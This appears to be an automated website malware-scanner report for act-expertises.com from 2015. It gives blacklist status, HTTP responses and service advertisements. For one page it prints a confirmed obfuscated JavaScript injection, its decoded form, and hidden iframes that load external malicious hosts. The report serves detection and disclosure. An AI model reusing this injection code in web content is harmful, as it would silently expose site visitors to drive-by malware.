New scan:

Malware Scanner report for act-expertises.com

Malicious/Suspicious/Total urls checked
1/0/5
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "act-expertises.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=act-expertises.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.act-expertises.com/
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 00:14:25 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6123
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224195776; path=/; expires=Tue, 13-Jan-2015 01:24:31 GMT
Set-Cookie: 60gp=R446941744; path=/; expires=Tue, 13-Jan-2015 01:24:31 GMT
clean
http://www.act-expertises.com/memo/index.html
200 OK
Content-Length: 6333
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3
... 4359 bytes are skipped ...
;3d&45&42&3d&44&43&3d&47&41&3d&45&48&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

Decoded script:


var Str="' height='1' style='visibility: hidden;'></iframe> <iframe src='http://socks4-5.biz/index.php' width='1"
document.write(Str.substring(52,105),Str.substring(0,52))

Antivirus reports:

DrWeb
SCRIPT.Virus

Hidden iFrame found.
size: 0x0     style: hidden
src: http://trafcount.cn/counter/index.php?out=1196394696

<iframe src="http://trafcount.cn/counter/index.php?out=1196394696" width="0" height="0" style="display:none">

http://www.act-expertises.com/memo/quota.cgi
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://www.act-expertises.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://www.act-expertises.com/quota.cgi
404 Not Found
Content-Length: 207
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: act-expertises.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: act-expertises.com
Referer: http://www.google.com/search?q=act-expertises.com

Result:
The result is similar to the first query. There are no suspicious redirects found.